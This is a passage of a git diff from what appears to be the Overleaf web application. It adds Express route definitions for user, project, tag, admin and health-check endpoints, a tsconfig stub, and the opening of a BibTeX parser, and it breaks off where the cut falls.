webRouter.post( + '/user/emails/confirm', + AuthenticationController.requireLogin(), + RateLimiterMiddleware.rateLimit(rateLimiters.confirmEmail), + UserEmailsController.confirm + ) + + webRouter.post( + '/user/emails/send-confirmation-code', + AuthenticationController.requireLogin(), + RateLimiterMiddleware.rateLimit(rateLimiters.sendConfirmation), + UserEmailsController.sendExistingSecondaryEmailConfirmationCode + ) + + webRouter.post( + '/user/emails/resend-confirmation-code', + AuthenticationController.requireLogin(), + RateLimiterMiddleware.rateLimit(rateLimiters.resendConfirmation), + UserEmailsController.resendExistingSecondaryEmailConfirmationCode + ) + + webRouter.post( + '/user/emails/confirm-code', + AuthenticationController.requireLogin(), + RateLimiterMiddleware.rateLimit(rateLimiters.confirmEmail), + UserEmailsController.checkExistingEmailConfirmationCode + ) + + webRouter.post( + '/user/emails/resend_confirmation', + AuthenticationController.requireLogin(), + RateLimiterMiddleware.rateLimit(rateLimiters.resendConfirmation), + await Modules.middleware('resendConfirmationEmail'), + UserEmailsController.resendConfirmation + ) + + webRouter.get( + '/user/emails/primary-email-check', + AuthenticationController.requireLogin(), + UserEmailsController.primaryEmailCheckPage + ) + + webRouter.post( + '/user/emails/primary-email-check', + AuthenticationController.requireLogin(), + PermissionsController.useCapabilities(), + UserEmailsController.primaryEmailCheck + ) + + if (Features.hasFeature('affiliations')) { + webRouter.post( + '/user/emails', + AuthenticationController.requireLogin(), + PermissionsController.requirePermission('add-secondary-email'), + RateLimiterMiddleware.rateLimit(rateLimiters.addEmail), + CaptchaMiddleware.validateCaptcha('addEmail'), + UserEmailsController.add + ) + + webRouter.post( + '/user/emails/delete', + AuthenticationController.requireLogin(), + RateLimiterMiddleware.rateLimit(rateLimiters.deleteEmail), + await Modules.middleware('userDeleteEmail'), + UserEmailsController.remove + ) + webRouter.post( + '/user/emails/default', + AuthenticationController.requireLogin(), + UserEmailsController.setDefault + ) + webRouter.post( + '/user/emails/endorse', + AuthenticationController.requireLogin(), + PermissionsController.requirePermission('endorse-email'), + RateLimiterMiddleware.rateLimit(rateLimiters.endorseEmail), + UserEmailsController.endorse + ) + } + + if (Features.hasFeature('saas')) { + webRouter.get( + '/user/emails/add-secondary', + AuthenticationController.requireLogin(), + PermissionsController.requirePermission('add-secondary-email'), + UserEmailsController.addSecondaryEmailPage + ) + + webRouter.get( + '/user/emails/confirm-secondary', + AuthenticationController.requireLogin(), + PermissionsController.requirePermission('add-secondary-email'), + UserEmailsController.confirmSecondaryEmailPage + ) + } + + webRouter.get( + '/user/sessions', + AuthenticationController.requireLogin(), + UserPagesController.sessionsPage + ) + webRouter.post( + '/user/sessions/clear', + AuthenticationController.requireLogin(), + UserController.clearSessions + ) + + // deprecated + webRouter.delete( + '/user/newsletter/unsubscribe', + AuthenticationController.requireLogin(), + UserController.unsubscribe + ) + + webRouter.post( + '/user/newsletter/unsubscribe', + AuthenticationController.requireLogin(), + UserController.unsubscribe + ) + + webRouter.post( + '/user/newsletter/subscribe', + AuthenticationController.requireLogin(), + UserController.subscribe + ) + + webRouter.get( + '/user/email-preferences', + AuthenticationController.requireLogin(), + UserPagesController.emailPreferencesPage + ) + + webRouter.post( + '/user/delete', + RateLimiterMiddleware.rateLimit(rateLimiters.deleteUser), + AuthenticationController.requireLogin(), + PermissionsController.requirePermission('delete-own-account'), + UserController.tryDeleteUser + ) + + webRouter.get( + '/user/personal_info', + AuthenticationController.requireLogin(), + UserInfoController.getLoggedInUsersPersonalInfo + ) + privateApiRouter.get( + '/user/:user_id/personal_info', + AuthenticationController.requirePrivateApiAuth(), + UserInfoController.getPersonalInfo + ) + + webRouter.get( + '/user/reconfirm', + UserPagesController.renderReconfirmAccountPage + ) + // for /user/reconfirm POST, see password router + + webRouter.get( + '/user/tpds/queues', + AuthenticationController.requireLogin(), + TpdsController.getQueues + ) + + webRouter.post( + '/tutorial/:tutorialKey/complete', + AuthenticationController.requireLogin(), + TutorialController.completeTutorial + ) + + webRouter.post( + '/tutorial/:tutorialKey/postpone', + AuthenticationController.requireLogin(), + TutorialController.postponeTutorial + ) + + webRouter.get( + '/user/projects', + AuthenticationController.requireLogin(), + ProjectController.userProjectsJson + ) + webRouter.get( + '/project/:Project_id/entities', + AuthenticationController.requireLogin(), + AuthorizationMiddleware.ensureUserCanReadProject, + ProjectController.projectEntitiesJson + ) + + webRouter.get( + '/project', + AuthenticationController.requireLogin(), + RateLimiterMiddleware.rateLimit(rateLimiters.openDashboard), + PermissionsController.useCapabilities(), + ProjectListController.projectListPage + ) + webRouter.post( + '/project/new', + AuthenticationController.requireLogin(), + RateLimiterMiddleware.rateLimit(rateLimiters.createProject), + ProjectController.newProject + ) + webRouter.post( + '/api/project', + AuthenticationController.requireLogin(), + RateLimiterMiddleware.rateLimit(rateLimiters.getProjects), + ProjectListController.getProjectsJson + ) + + for (const route of [ + // Keep the old route for continuous metrics + '/Project/:Project_id', + // New route for pdf-detach + '/Project/:Project_id/:detachRole(detacher|detached)', + ]) { + webRouter.get( + route, + RateLimiterMiddleware.rateLimit(openProjectRateLimiter, { + params: ['Project_id'], + }), + PermissionsController.useCapabilities(), + AuthorizationMiddleware.ensureUserCanReadProject, + ProjectController.loadEditor + ) + } + webRouter.head( + '/Project/:Project_id/file/:File_id', + AuthorizationMiddleware.ensureUserCanReadProject, + FileStoreController.getFileHead + ) + webRouter.get( + '/Project/:Project_id/file/:File_id', + AuthorizationMiddleware.ensureUserCanReadProject, + FileStoreController.getFile + ) + + webRouter.get( + '/Project/:Project_id/doc/:Doc_id/download', // "download" suffix to avoid conflict with private API route at doc/:doc_id + AuthorizationMiddleware.ensureUserCanReadProject, + DocumentUpdaterController.getDoc + ) + webRouter.post( + '/project/:Project_id/settings', + validate({ + body: Joi.object({ + publicAccessLevel: Joi.string() + .valid(PublicAccessLevels.PRIVATE, PublicAccessLevels.TOKEN_BASED) + .optional(), + }), + }), + AuthorizationMiddleware.ensureUserCanWriteProjectSettings, + ProjectController.updateProjectSettings + ) + webRouter.post( + '/project/:Project_id/settings/admin', + AuthenticationController.requireLogin(), + AuthorizationMiddleware.ensureUserCanAdminProject, + ProjectController.updateProjectAdminSettings + ) + + webRouter.post( + '/project/:Project_id/compile', + RateLimiterMiddleware.rateLimit(rateLimiters.compileProjectHttp, { + params: ['Project_id'], + }), + AuthorizationMiddleware.ensureUserCanReadProject, + CompileController.compile + ) + + webRouter.post( + '/project/:Project_id/compile/stop', + AuthorizationMiddleware.ensureUserCanReadProject, + CompileController.stopCompile + ) + + webRouter.get( + '/project/:Project_id/output/cached/output.overleaf.json', + AuthorizationMiddleware.ensureUserCanReadProject, + ClsiCacheController.getLatestBuildFromCache + ) + + webRouter.get( + '/download/project/:Project_id/build/:buildId/output/cached/:filename', + AuthorizationMiddleware.ensureUserCanReadProject, + ClsiCacheController.downloadFromCache + ) + + // PDF Download button for specific build + webRouter.get( + '/download/project/:Project_id/build/:build_id/output/output.pdf', + AuthorizationMiddleware.ensureUserCanReadProject, + CompileController.downloadPdf + ) + + // Align with limits defined in CompileController.downloadPdf + const rateLimiterMiddlewareOutputFiles = RateLimiterMiddleware.rateLimit( + rateLimiters.miscOutputDownload, + { params: ['Project_id'] } + ) + + // direct url access to output files for a specific build + webRouter.get( + /^\/project\/([^/]*)\/build\/([0-9a-f-]+)\/output\/(.*)$/, + function (req, res, next) { + const params = { + Project_id: req.params[0], + build_id: req.params[1], + file: req.params[2], + } + req.params = params + next() + }, + rateLimiterMiddlewareOutputFiles, + AuthorizationMiddleware.ensureUserCanReadProject, + CompileController.getFileFromClsi + ) + + // direct url access to output files for a specific user and build + webRouter.get( + /^\/project\/([^/]*)\/user\/([0-9a-f]+)\/build\/([0-9a-f-]+)\/output\/(.*)$/, + function (req, res, next) { + const params = { + Project_id: req.params[0], + user_id: req.params[1], + build_id: req.params[2], + file: req.params[3], + } + req.params = params + next() + }, + rateLimiterMiddlewareOutputFiles, + AuthorizationMiddleware.ensureUserCanReadProject, + CompileController.getFileFromClsi + ) + + webRouter.delete( + '/project/:Project_id/output', + validate({ query: { clsiserverid: Joi.string() } }), + AuthorizationMiddleware.ensureUserCanReadProject, + CompileController.deleteAuxFiles + ) + webRouter.get( + '/project/:Project_id/sync/code', + AuthorizationMiddleware.ensureUserCanReadProject, + CompileController.proxySyncCode + ) + webRouter.get( + '/project/:Project_id/sync/pdf', + AuthorizationMiddleware.ensureUserCanReadProject, + CompileController.proxySyncPdf + ) + webRouter.get( + '/project/:Project_id/wordcount', + validate({ query: { clsiserverid: Joi.string() } }), + AuthorizationMiddleware.ensureUserCanReadProject, + CompileController.wordCount + ) + + webRouter.post( + '/Project/:Project_id/archive', + AuthenticationController.requireLogin(), + AuthorizationMiddleware.ensureUserCanReadProject, + ProjectController.archiveProject + ) + webRouter.delete( + '/Project/:Project_id/archive', + AuthenticationController.requireLogin(), + AuthorizationMiddleware.ensureUserCanReadProject, + ProjectController.unarchiveProject + ) + webRouter.post( + '/project/:project_id/trash', + AuthenticationController.requireLogin(), + AuthorizationMiddleware.ensureUserCanReadProject, + ProjectController.trashProject + ) + webRouter.delete( + '/project/:project_id/trash', + AuthenticationController.requireLogin(), + AuthorizationMiddleware.ensureUserCanReadProject, + ProjectController.untrashProject + ) + + webRouter.delete( + '/Project/:Project_id', + AuthenticationController.requireLogin(), + AuthorizationMiddleware.ensureUserCanAdminProject, + ProjectController.deleteProject + ) + + webRouter.post( + '/Project/:Project_id/restore', + AuthenticationController.requireLogin(), + AuthorizationMiddleware.ensureUserCanAdminProject, + ProjectController.restoreProject + ) + webRouter.post( + '/Project/:Project_id/clone', + AuthorizationMiddleware.ensureUserCanReadProject, + ProjectController.cloneProject + ) + + webRouter.post( + '/project/:Project_id/rename', + AuthenticationController.requireLogin(), + AuthorizationMiddleware.ensureUserCanAdminProject, + ProjectController.renameProject + ) + webRouter.post( + '/project/:project_id/export/:brand_variation_id', + AuthorizationMiddleware.ensureUserCanWriteProjectContent, + ExportsController.exportProject + ) + webRouter.get( + '/project/:project_id/export/:export_id', + AuthorizationMiddleware.ensureUserCanWriteProjectContent, + ExportsController.exportStatus + ) + webRouter.get( + '/project/:project_id/export/:export_id/:type', + AuthorizationMiddleware.ensureUserCanWriteProjectContent, + ExportsController.exportDownload + ) + + webRouter.get( + '/Project/:Project_id/download/zip', + RateLimiterMiddleware.rateLimit(rateLimiters.zipDownload, { + params: ['Project_id'], + }), + AuthorizationMiddleware.ensureUserCanReadProject, + ProjectDownloadsController.downloadProject + ) + webRouter.get( + '/project/download/zip', + AuthenticationController.requireLogin(), + RateLimiterMiddleware.rateLimit(rateLimiters.multipleProjectsZipDownload), + AuthorizationMiddleware.ensureUserCanReadMultipleProjects, + ProjectDownloadsController.downloadMultipleProjects + ) + + webRouter.get( + '/project/:project_id/metadata', + AuthorizationMiddleware.ensureUserCanReadProject, + Settings.allowAnonymousReadAndWriteSharing + ? (req, res, next) => { + next() + } + : AuthenticationController.requireLogin(), + MetaController.getMetadata + ) + webRouter.post( + '/project/:project_id/doc/:doc_id/metadata', + AuthorizationMiddleware.ensureUserCanReadProject, + Settings.allowAnonymousReadAndWriteSharing + ? (req, res, next) => { + next() + } + : AuthenticationController.requireLogin(), + MetaController.broadcastMetadataForDoc + ) + privateApiRouter.post( + '/internal/expire-deleted-projects-after-duration', + AuthenticationController.requirePrivateApiAuth(), + ProjectController.expireDeletedProjectsAfterDuration + ) + privateApiRouter.post( + '/internal/expire-deleted-users-after-duration', + AuthenticationController.requirePrivateApiAuth(), + UserController.expireDeletedUsersAfterDuration + ) + privateApiRouter.post( + '/internal/project/:projectId/expire-deleted-project', + AuthenticationController.requirePrivateApiAuth(), + ProjectController.expireDeletedProject + ) + privateApiRouter.post( + '/internal/users/:userId/expire', + AuthenticationController.requirePrivateApiAuth(), + UserController.expireDeletedUser + ) + + privateApiRouter.get( + '/user/:userId/tag', + AuthenticationController.requirePrivateApiAuth(), + TagsController.apiGetAllTags + ) + webRouter.get( + '/tag', + AuthenticationController.requireLogin(), + TagsController.getAllTags + ) + webRouter.post( + '/tag', + AuthenticationController.requireLogin(), + RateLimiterMiddleware.rateLimit(rateLimiters.createTag), + validate({ + body: Joi.object({ + name: Joi.string().required(), + color: Joi.string(), + }), + }), + TagsController.createTag + ) + webRouter.post( + '/tag/:tagId/rename', + AuthenticationController.requireLogin(), + RateLimiterMiddleware.rateLimit(rateLimiters.renameTag), + validate({ + body: Joi.object({ + name: Joi.string().required(), + }), + }), + TagsController.renameTag + ) + webRouter.post( + '/tag/:tagId/edit', + AuthenticationController.requireLogin(), + RateLimiterMiddleware.rateLimit(rateLimiters.renameTag), + validate({ + body: Joi.object({ + name: Joi.string().required(), + color: Joi.string(), + }), + }), + TagsController.editTag + ) + webRouter.delete( + '/tag/:tagId', + AuthenticationController.requireLogin(), + RateLimiterMiddleware.rateLimit(rateLimiters.deleteTag), + TagsController.deleteTag + ) + webRouter.post( + '/tag/:tagId/project/:projectId', + AuthenticationController.requireLogin(), + RateLimiterMiddleware.rateLimit(rateLimiters.addProjectToTag), + TagsController.addProjectToTag + ) + webRouter.post( + '/tag/:tagId/projects', + AuthenticationController.requireLogin(), + RateLimiterMiddleware.rateLimit(rateLimiters.addProjectsToTag), + validate({ + body: Joi.object({ + projectIds: Joi.array().items(Joi.string()).required(), + }), + }), + TagsController.addProjectsToTag + ) + webRouter.delete( + '/tag/:tagId/project/:projectId', + AuthenticationController.requireLogin(), + RateLimiterMiddleware.rateLimit(rateLimiters.removeProjectFromTag), + TagsController.removeProjectFromTag + ) + webRouter.post( + '/tag/:tagId/projects/remove', + AuthenticationController.requireLogin(), + RateLimiterMiddleware.rateLimit(rateLimiters.removeProjectsFromTag), + validate({ + body: Joi.object({ + projectIds: Joi.array().items(Joi.string()).required(), + }), + }), + TagsController.removeProjectsFromTag + ) + + webRouter.get( + '/notifications', + AuthenticationController.requireLogin(), + NotificationsController.getAllUnreadNotifications + ) + webRouter.delete( + '/notifications/:notificationId', + AuthenticationController.requireLogin(), + NotificationsController.markNotificationAsRead + ) + + // Deprecated in favour of /internal/project/:project_id but still used by versioning + privateApiRouter.get( + '/project/:project_id/details', + AuthenticationController.requirePrivateApiAuth(), + ProjectApiController.getProjectDetails + ) + + // New 'stable' /internal API end points + privateApiRouter.get( + '/internal/project/:project_id', + AuthenticationController.requirePrivateApiAuth(), + ProjectApiController.getProjectDetails + ) + privateApiRouter.get( + '/internal/project/:Project_id/zip', + AuthenticationController.requirePrivateApiAuth(), + ProjectDownloadsController.downloadProject + ) + privateApiRouter.get( + '/internal/project/:project_id/compile/pdf', + AuthenticationController.requirePrivateApiAuth(), + CompileController.compileAndDownloadPdf + ) + + privateApiRouter.post( + '/internal/deactivateOldProjects', + AuthenticationController.requirePrivateApiAuth(), + InactiveProjectController.deactivateOldProjects + ) + privateApiRouter.post( + '/internal/project/:project_id/deactivate', + AuthenticationController.requirePrivateApiAuth(), + InactiveProjectController.deactivateProject + ) + + privateApiRouter.get( + '/project/:Project_id/doc/:doc_id', + AuthenticationController.requirePrivateApiAuth(), + DocumentController.getDocument + ) + privateApiRouter.post( + '/project/:Project_id/doc/:doc_id', + AuthenticationController.requirePrivateApiAuth(), + DocumentController.setDocument + ) + + privateApiRouter.post( + '/user/:user_id/project/new', + AuthenticationController.requirePrivateApiAuth(), + TpdsController.createProject + ) + privateApiRouter.post( + '/tpds/folder-update', + AuthenticationController.requirePrivateApiAuth(), + TpdsController.updateFolder + ) + privateApiRouter.post( + '/user/:user_id/update/*', + AuthenticationController.requirePrivateApiAuth(), + TpdsController.mergeUpdate + ) + privateApiRouter.delete( + '/user/:user_id/update/*', + AuthenticationController.requirePrivateApiAuth(), + TpdsController.deleteUpdate + ) + privateApiRouter.post( + '/project/:project_id/user/:user_id/update/*', + AuthenticationController.requirePrivateApiAuth(), + TpdsController.mergeUpdate + ) + privateApiRouter.delete( + '/project/:project_id/user/:user_id/update/*', + AuthenticationController.requirePrivateApiAuth(), + TpdsController.deleteUpdate + ) + + privateApiRouter.post( + '/project/:project_id/contents/*', + AuthenticationController.requirePrivateApiAuth(), + TpdsController.updateProjectContents + ) + privateApiRouter.delete( + '/project/:project_id/contents/*', + AuthenticationController.requirePrivateApiAuth(), + TpdsController.deleteProjectContents + ) + + webRouter.post( + '/spelling/learn', + validate({ + body: Joi.object({ + word: Joi.string().required(), + }), + }), + AuthenticationController.requireLogin(), + SpellingController.learn + ) + + webRouter.post( + '/spelling/unlearn', + validate({ + body: Joi.object({ + word: Joi.string().required(), + }), + }), + AuthenticationController.requireLogin(), + SpellingController.unlearn + ) + + if (Features.hasFeature('chat')) { + webRouter.get( + '/project/:project_id/messages', + AuthorizationMiddleware.blockRestrictedUserFromProject, + AuthorizationMiddleware.ensureUserCanReadProject, + PermissionsController.requirePermission('chat'), + ChatController.getMessages + ) + webRouter.post( + '/project/:project_id/messages', + AuthorizationMiddleware.blockRestrictedUserFromProject, + AuthorizationMiddleware.ensureUserCanReadProject, + PermissionsController.requirePermission('chat'), + RateLimiterMiddleware.rateLimit(rateLimiters.sendChatMessage), + ChatController.sendMessage + ) + } + + webRouter.post( + '/project/:Project_id/references/indexAll', + AuthorizationMiddleware.ensureUserCanReadProject, + RateLimiterMiddleware.rateLimit(rateLimiters.indexAllProjectReferences), + ReferencesController.indexAll + ) + + // disable beta program while v2 is in beta + webRouter.get( + '/beta/participate', + AuthenticationController.requireLogin(), + BetaProgramController.optInPage + ) + webRouter.post( + '/beta/opt-in', + AuthenticationController.requireLogin(), + BetaProgramController.optIn + ) + webRouter.post( + '/beta/opt-out', + AuthenticationController.requireLogin(), + BetaProgramController.optOut + ) + + webRouter.get('/chrome', function (req, res, next) { + // Match v1 behaviour - this is used for a Chrome web app + if (SessionManager.isUserLoggedIn(req.session)) { + res.redirect('/project') + } else { + res.redirect('/register') + } + }) + + webRouter.get( + '/admin', + AuthorizationMiddleware.ensureUserIsSiteAdmin, + AdminController.index + ) + + if (!Features.hasFeature('saas')) { + webRouter.post( + '/admin/openEditor', + AuthorizationMiddleware.ensureUserIsSiteAdmin, + AdminController.openEditor + ) + webRouter.post( + '/admin/closeEditor', + AuthorizationMiddleware.ensureUserIsSiteAdmin, + AdminController.closeEditor + ) + webRouter.post( + '/admin/disconnectAllUsers', + AuthorizationMiddleware.ensureUserIsSiteAdmin, + AdminController.disconnectAllUsers + ) + } + webRouter.post( + '/admin/flushProjectToTpds', + AuthorizationMiddleware.ensureUserIsSiteAdmin, + AdminController.flushProjectToTpds + ) + webRouter.post( + '/admin/pollDropboxForUser', + AuthorizationMiddleware.ensureUserIsSiteAdmin, + AdminController.pollDropboxForUser + ) + webRouter.post( + '/admin/messages', + AuthorizationMiddleware.ensureUserIsSiteAdmin, + AdminController.createMessage + ) + webRouter.post( + '/admin/messages/clear', + AuthorizationMiddleware.ensureUserIsSiteAdmin, + AdminController.clearMessages + ) + + privateApiRouter.get('/perfTest', (req, res) => { + plainTextResponse(res, 'hello') + }) + + publicApiRouter.get('/status', (req, res) => { + if (Settings.shuttingDown) { + res.sendStatus(503) // Service unavailable + } else if (!Settings.siteIsOpen) { + plainTextResponse(res, 'web site is closed (web)') + } else if (!Settings.editorIsOpen) { + plainTextResponse(res, 'web editor is closed (web)') + } else { + plainTextResponse(res, 'web is alive (web)') + } + }) + privateApiRouter.get('/status', (req, res) => { + plainTextResponse(res, 'web is alive (api)') + }) + + // used by kubernetes health-check and acceptance tests + webRouter.get('/dev/csrf', (req, res) => { + plainTextResponse(res, res.locals.csrfToken) + }) + + publicApiRouter.get( + '/health_check', + HealthCheckController.checkActiveHandles, + HealthCheckController.check + ) + privateApiRouter.get( + '/health_check', + HealthCheckController.checkActiveHandles, + HealthCheckController.checkApi + ) + publicApiRouter.get( + '/health_check/api', + HealthCheckController.checkActiveHandles, + HealthCheckController.checkApi + ) + privateApiRouter.get( + '/health_check/api', + HealthCheckController.checkActiveHandles, + HealthCheckController.checkApi + ) + publicApiRouter.get( + '/health_check/full', + HealthCheckController.checkActiveHandles, + HealthCheckController.check + ) + privateApiRouter.get( + '/health_check/full', + HealthCheckController.checkActiveHandles, + HealthCheckController.check + ) + + publicApiRouter.get('/health_check/redis', HealthCheckController.checkRedis) + privateApiRouter.get('/health_check/redis', HealthCheckController.checkRedis) + + publicApiRouter.get('/health_check/mongo', HealthCheckController.checkMongo) + privateApiRouter.get('/health_check/mongo', HealthCheckController.checkMongo) + + webRouter.get( + '/status/compiler/:Project_id', + RateLimiterMiddleware.rateLimit(rateLimiters.statusCompiler), + AuthorizationMiddleware.ensureUserCanReadProject, + function (req, res) { + const projectId = req.params.Project_id + // use a valid user id for testing + const testUserId = '123456789012345678901234' + const sendRes = _.once(function (statusCode, message) { + res.status(statusCode) + plainTextResponse(res, message) + ClsiCookieManager.clearServerId(projectId, testUserId, () => {}) + }) // force every compile to a new server + // set a timeout + let handler = setTimeout(function () { + sendRes(500, 'Compiler timed out') + handler = null + }, 10000) + // run the compile + CompileManager.compile( + projectId, + testUserId, + {}, + function (error, status) { + if (handler) { + clearTimeout(handler) + } + if (error) { + sendRes(500, `Compiler returned error ${error.message}`) + } else if (status === 'success') { + sendRes(200, 'Compiler returned in less than 10 seconds') + } else { + sendRes(500, `Compiler returned failure ${status}`) + } + } + ) + } + ) + + webRouter.post('/error/client', function (req, res, next) { + logger.warn( + { err: req.body.error, meta: req.body.meta }, + 'client side error' + ) + metrics.inc('client-side-error') + res.sendStatus(204) + }) + + webRouter.get( + `/read/:token(${TokenAccessController.READ_ONLY_TOKEN_PATTERN})`, + RateLimiterMiddleware.rateLimit(rateLimiters.readOnlyToken), + AnalyticsRegistrationSourceMiddleware.setSource( + 'collaboration', + 'link-sharing' + ), + TokenAccessController.tokenAccessPage, + AnalyticsRegistrationSourceMiddleware.clearSource() + ) + + webRouter.get( + `/:token(${TokenAccessController.READ_AND_WRITE_TOKEN_PATTERN})`, + RateLimiterMiddleware.rateLimit(rateLimiters.readAndWriteToken), + AnalyticsRegistrationSourceMiddleware.setSource( + 'collaboration', + 'link-sharing' + ), + TokenAccessController.tokenAccessPage, + AnalyticsRegistrationSourceMiddleware.clearSource() + ) + + webRouter.post( + `/:token(${TokenAccessController.READ_AND_WRITE_TOKEN_PATTERN})/grant`, + RateLimiterMiddleware.rateLimit(rateLimiters.grantTokenAccessReadWrite), + TokenAccessController.grantTokenAccessReadAndWrite + ) + + webRouter.post( + `/read/:token(${TokenAccessController.READ_ONLY_TOKEN_PATTERN})/grant`, + RateLimiterMiddleware.rateLimit(rateLimiters.grantTokenAccessReadOnly), + TokenAccessController.grantTokenAccessReadOnly + ) + + webRouter.get('/unsupported-browser', renderUnsupportedBrowserPage) + + webRouter.get('*', ErrorController.notFound) +} + +export default { initialize, rateLimiters } diff --git a/services/web/app/src/tsconfig.json b/services/web/app/src/tsconfig.json new file mode 100644 index 0000000..126da92 --- /dev/null +++ b/services/web/app/src/tsconfig.json @@ -0,0 +1 @@ +{ "extends": "../../tsconfig.backend.json" } diff --git a/services/web/app/src/util/bib2json.js b/services/web/app/src/util/bib2json.js new file mode 100644 index 0000000..b105ff3 --- /dev/null +++ b/services/web/app/src/util/bib2json.js @@ -0,0 +1,1966 @@ +/* eslint-disable */ +/** + * Parser.js + * Copyright 2012-13 Mayank Lahiri + * mlahiri@gmail.com + * Released under the BSD License. + * + * Modifications 2016 Sharelatex + * Modifications 2017-2020 Overleaf + * + * A forgiving Bibtex parser that can: + * + * (1) operate in streaming or block mode, extracting entries as dictionaries. + * (2) convert Latex special characters to UTF-8. + * (3) best-effort parse malformed entries. + * (4) run in a CommonJS environment or a browser, without any dependencies. + * (5) be advanced-compiled by Google Closure Compiler. + * + * Handwritten as a labor of love, not auto-generated from a grammar. + * + * Modes of usage: + * + * (1) Synchronous, string + * + * var entries = BibtexParser(text); + * console.log(entries); + * + * (2) Asynchronous, stream + * + * function entryCallback(entry) { console.log(entry); } + * var parser = new BibtexParser(entryCallback); + * parser.parse(chunk1); + * parser.parse(chunk2); + * ... + * + * @param {text|function(Object)} arg0 Either a Bibtex string or callback + * function for processing parsed entries. + * @param {array} allowedKeys optimization: do not output key/value pairs that are not on this allowlist + * @constructor + */ +function BibtexParser(arg0, allowedKeys) { + // Determine how this function is to be used + if (typeof arg0 === 'string') { + // Passed a string, synchronous call without 'new' + const entries = [] + function accumulator(entry) { + entries.push(entry) + } + const parser = new BibtexParser(accumulator, allowedKeys) + parser.parse(arg0) + return { + entries, + errors: parser.getErrors(), + } + } + if (typeof arg0 !== 'function') { + throw 'Invalid parser construction.' + } + this.ALLOWEDKEYS_ = allowedKeys || [] + this.reset_(arg0) + this.initMacros_() + return this +} + +/** @enum {number} */ +BibtexParser.prototype.STATES_ = { + ENTRY_OR_JUNK: 0, + OBJECT_TYPE: 1, + ENTRY_KEY: 2, + KV_KEY: 3, + EQUALS: 4, + KV_VALUE: 5, +} +BibtexParser.prototype.reset_ = function (arg0) { + /** @private */ this.DATA_ = {} + /** @private */ this.CALLBACK_ = arg0 + /** @private */ this.CHAR_ = 0 + /** @private */ this.LINE_ = 1 + /** @private */ this.CHAR_IN_LINE_ = 0 + /** @private */ this.SKIPWS_ = true + /** @private */ this.SKIPCOMMENT_ = true + /** @private */ this.SKIPKVPAIR_ = false + /** @private */ this.PARSETMP_ = {} + /** @private */ this.SKIPTILLEOL_ = false + /** @private */ this.VALBRACES_ = null + /** @private */ this.BRACETYPE_ = null + /** @private */ this.BRACECOUNT_ = 0 + /** @private */ this.STATE_ = this.STATES_.ENTRY_OR_JUNK + /** @private */ this.ERRORS_ = [] +} +/** @private */ BibtexParser.prototype.ENTRY_TYPES_ = { + inproceedings: 1, + proceedings: 2, + article: 3, + techreport: 4, + misc: 5, + mastersthesis: 6, + book: 7, + phdthesis: 8, + incollection: 9, + unpublished: 10, + inbook: 11, + manual: 12, + periodical: 13, + booklet: 14, + masterthesis: 15, + conference: 16, + /* additional fields from biblatex */ + artwork: 17, + audio: 18, + bibnote: 19, + bookinbook: 20, + collection: 21, + commentary: 22, + customa: 23, + customb: 24, + customc: 25, + customd: 26, + custome: 27, + customf: 28, + image: 29, + inreference: 30, + jurisdiction: 31, + legal: 32, + legislation: 33, + letter: 34, + movie: 35, + music: 36, + mvbook: 37, + mvcollection: 38, + mvproceedings: 39, + mvreference: 40, + online: 41, + patent: 42, + performance: 43, + reference: 44, + report: 45, + review: 46, + set: 47, + software: 48, + standard: 49, + suppbook: 50, + suppcollection: 51, + thesis: 52, + video: 53, +} +BibtexParser.prototype.initMacros_ = function () { + // macros can be extended by the user via + // @string { macroName = "macroValue" } + /** @private */ this.MACROS_ = { + jan: 'January', + feb: 'February', + mar: 'March', + apr: 'April', + may: 'May', + jun: 'June', + jul: 'July', + aug: 'August', + sep: 'September', + oct: 'October', + nov: 'November', + dec: 'December', + Jan: 'January', + Feb: 'February', + Mar: 'March', + Apr: 'April', + May: 'May', + Jun: 'June', + Jul: 'July', + Aug: 'August', + Sep: 'September', + Oct: 'October', + Nov: 'November', + Dec: 'December', + } +} + +/** + * Gets an array of all errors encountered during parsing. + * Array entries are of the format: + * [ line number, character in line, character in stream, error text ] + * + * @returns Array<Array> + * @public + */ +BibtexParser.prototype.getErrors = function () { + return this.ERRORS_ +} + +/** + * Processes a chunk of data + * @public + */ +BibtexParser.prototype.parse = function (chunk) { + for (let i = 0; i < chunk.length; i++) this.processCharacter_(chunk[i]) +} + +/** + * Logs error at current stream position. + * + * @private + */ +BibtexParser.prototype.error_ = function (text) { + this.ERRORS_.push([this.LINE_, this.CHAR_IN_LINE_, this.CHAR_, text]) +} + +/** + * Called after an entire entry has been parsed from the stream. + * Performs post-processing and invokes the entry callback pointed to by + * this.CALLBACK_. Parsed (but unprocessed) entry data is in this.DATA_. + */ +BibtexParser.prototype.processEntry_ = function () { + const data = this.DATA_ + if (data.Fields) + for (const f in data.Fields) { + let raw = data.Fields[f] + + // Convert Latex/Bibtex special characters to UTF-8 equivalents + for (let i = 0; i < this.CHARCONV_.length; i++) { + const re = this.CHARCONV_[i][0] + const rep = this.CHARCONV_[i][1] + raw = raw.replace(re, rep) + } + + // Basic substitutions + raw = raw + .replace(/[\n\r\t]/g, ' ') + .replace(/\s\s+/g, ' ') + .replace(/^\s+|\s+$/g, '') + + // Remove braces and backslashes + const len = raw.length + let processedArr = [] + for (let i = 0; i < len; i++) { + let c = raw[i] + let skip = false + if (c == '\\' && i < len - 1) c = raw[++i] + else { + if (c == '{' || c == '}') skip = true + } + if (!skip) processedArr.push(c) + } + data.Fields[f] = processedArr.join('') + processedArr = null + } + + if (data.ObjectType == 'string') { + for (const f in data.Fields) { + this.MACROS_[f] = data.Fields[f] + } + } else { + // Parsed a new Bibtex entry + this.CALLBACK_(data) + } +} + +/** + * Processes next character in the stream, invoking the callback after + * each entry has been found and processed. + * + * @private + * @param {string} c Next character in input stream + */ +BibtexParser.prototype.processCharacter_ = function (c) { + // Housekeeping + this.CHAR_++ + this.CHAR_IN_LINE_++ + if (c == '\n') { + this.LINE_++ + this.CHAR_IN_LINE_ = 1 + } + + // Convenience states for skipping whitespace when needed + if (this.SKIPTILLEOL_) { + if (c == '\n') this.SKIPTILLEOL_ = false + return + } + if (this.SKIPCOMMENT_ && c == '%') { + this.SKIPTILLEOL_ = true + return + } + if (this.SKIPWS_ && /\s/.test(c)) return + this.SKIPWS_ = false + this.SKIPCOMMENT_ = false + this.SKIPTILLEOL_ = false + + // Main state machine + let AnotherIteration = true + while (AnotherIteration) { + // console.log(this.LINE_, this.CHAR_IN_LINE_, this.STATE_, c) + AnotherIteration = false + switch (this.STATE_) { + // -- Scan for an object marker ('@') + // -- Reset temporary data structure in case previous entry was garbled + case this.STATES_.ENTRY_OR_JUNK: + if (c == '@') { + // 